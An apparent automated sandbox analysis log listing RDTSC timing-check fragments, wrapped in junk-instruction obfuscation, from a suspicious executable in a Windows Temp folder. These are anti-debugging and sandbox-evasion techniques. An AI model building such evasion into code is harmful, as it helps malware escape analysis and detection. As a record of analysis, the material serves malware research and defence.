Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D251C9 second address: D251D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD38Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D251D9 second address: D251F2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F58F4C28976h 0x00000011 jns 00007F58F4C28976h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2549D second address: D254A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2578B second address: D25798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D25D97 second address: D25D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D25D9F second address: D25DA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D25DA9 second address: D25DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D25DAD second address: D25DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26042 second address: D26051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F58F53CD386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26051 second address: D26057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26372 second address: D263AB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F58F53CD394h 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop esi 0x00000015 jmp 00007F58F53CD392h 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2663B second address: D2663F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2699F second address: D269A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2B871 second address: D2B890 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F58F4C2897Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F58F4C28978h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2A99E second address: D2A9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2A9A4 second address: D2A9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2B138 second address: D2B13D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2B13D second address: D2B15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28986h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D37B86 second address: D37B8B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D37B8B second address: D37BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F58F4C28986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35CCA second address: D35CFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F58F53CD38Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F58F53CD394h 0x00000010 push eax 0x00000011 jnl 00007F58F53CD386h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35CFB second address: D35D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F58F4C28978h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363A5 second address: D363BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F58F53CD38Fh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363BC second address: D363D7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F4C2898Dh 0x00000008 jmp 00007F58F4C28981h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363D7 second address: D363DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363DE second address: D363EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F58F4C28976h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363EE second address: D363F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D366B2 second address: D366DE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F4C28985h 0x00000008 jmp 00007F58F4C2897Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F58F4C28981h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D366DE second address: D366F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F53CD392h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D366F7 second address: D366FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D36859 second address: D36896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F58F53CD386h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d jno 00007F58F53CD392h 0x00000013 push edi 0x00000014 jng 00007F58F53CD386h 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F58F53CD38Ch 0x00000024 jg 00007F58F53CD386h 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D36B49 second address: D36B70 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F4C28976h 0x00000008 jne 00007F58F4C28976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F58F4C28987h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D36B70 second address: D36B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D37994 second address: D37998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D37998 second address: D379CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F58F53CD38Eh 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 jmp 00007F58F53CD392h 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D379CA second address: D379CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D379CE second address: D379E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35858 second address: D3585C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D3585C second address: D35866 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35866 second address: D3586B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D3586B second address: D35871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35871 second address: D35877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35877 second address: D3587D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D3EEA9 second address: D3EEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D40711 second address: D40715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D40715 second address: D40719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4AA3D second address: D4AA4F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F58F53CD386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809B0 second address: 54809B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809B4 second address: 54809BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809BA second address: 54809C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809C0 second address: 54809F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov dl, cl 0x00000010 pushad 0x00000011 mov cx, di 0x00000014 mov cx, di 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov eax, edi 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809F4 second address: 54809F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809F8 second address: 5480A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 mov si, C667h 0x0000000b pop ecx 0x0000000c popad 0x0000000d and dword ptr [eax], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, 0A12B8D6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440345 second address: 5440354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440354 second address: 544036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28984h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 544036C second address: 54403C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push edi 0x0000000f mov bl, ah 0x00000011 pop edx 0x00000012 popad 0x00000013 and esp, FFFFFFF8h 0x00000016 pushad 0x00000017 push esi 0x00000018 mov dx, 5996h 0x0000001c pop edx 0x0000001d pushfd 0x0000001e jmp 00007F58F53CD38Ch 0x00000023 add esi, 2003C688h 0x00000029 jmp 00007F58F53CD38Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F58F53CD395h 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54403C7 second address: 5440431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C28987h 0x00000009 xor eax, 47A6D02Eh 0x0000000f jmp 00007F58F4C28989h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F58F4C28980h 0x0000001b add ch, FFFFFFA8h 0x0000001e jmp 00007F58F4C2897Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 push eax 0x00000028 pushad 0x00000029 mov ah, FCh 0x0000002b popad 0x0000002c xchg eax, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov edx, esi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440431 second address: 54404A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F58F53CD396h 0x0000000f push eax 0x00000010 jmp 00007F58F53CD38Bh 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F58F53CD396h 0x0000001b mov ebx, dword ptr [ebp+10h] 0x0000001e pushad 0x0000001f push ecx 0x00000020 push edx 0x00000021 pop esi 0x00000022 pop edi 0x00000023 mov edi, ecx 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 jmp 00007F58F53CD390h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov eax, edi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54404A9 second address: 5440541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e popad 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007F58F4C2897Fh 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 call 00007F58F4C28984h 0x0000001e movzx esi, bx 0x00000021 pop edi 0x00000022 call 00007F58F4C2897Ch 0x00000027 push ecx 0x00000028 pop edx 0x00000029 pop eax 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F58F4C2897Ch 0x00000031 xchg eax, edi 0x00000032 pushad 0x00000033 mov edi, ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007F58F4C28988h 0x0000003d add eax, 1421C308h 0x00000043 jmp 00007F58F4C2897Bh 0x00000048 popfd 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440541 second address: 544058A instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test esi, esi 0x0000000a jmp 00007F58F53CD392h 0x0000000f je 00007F5967CEB43Eh 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F58F53CD38Eh 0x0000001c or eax, 6066F898h 0x00000022 jmp 00007F58F53CD38Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a movzx ecx, dx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 544058A second address: 544061C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F58F4C2897Bh 0x00000008 xor ecx, 0015415Eh 0x0000000e jmp 00007F58F4C28989h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F58F4C28983h 0x00000027 sub ecx, 332A5B6Eh 0x0000002d jmp 00007F58F4C28989h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F58F4C28980h 0x00000039 sbb ax, CEE8h 0x0000003e jmp 00007F58F4C2897Bh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 544061C second address: 5440622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440622 second address: 5440626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440626 second address: 5440660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5967CEB383h 0x0000000e jmp 00007F58F53CD397h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F58F53CD38Bh 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440660 second address: 5440665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440665 second address: 5440687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F58F53CD396h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440687 second address: 5440759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007F58F4C28986h 0x00000014 jne 00007F596754694Ch 0x0000001a pushad 0x0000001b push ecx 0x0000001c pushfd 0x0000001d jmp 00007F58F4C2897Dh 0x00000022 and si, C7D6h 0x00000027 jmp 00007F58F4C28981h 0x0000002c popfd 0x0000002d pop ecx 0x0000002e jmp 00007F58F4C28981h 0x00000033 popad 0x00000034 test byte ptr [esi+48h], 00000001h 0x00000038 pushad 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F58F4C28986h 0x00000040 or cx, 9058h 0x00000045 jmp 00007F58F4C2897Bh 0x0000004a popfd 0x0000004b popad 0x0000004c call 00007F58F4C28988h 0x00000051 jmp 00007F58F4C28982h 0x00000056 pop ecx 0x00000057 popad 0x00000058 jne 00007F59675468CAh 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440759 second address: 5440773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD396h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440773 second address: 54407BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C28981h 0x00000009 and ax, 4EB6h 0x0000000e jmp 00007F58F4C28981h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test bl, 00000007h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F58F4C28984h 0x00000025 rdtsc
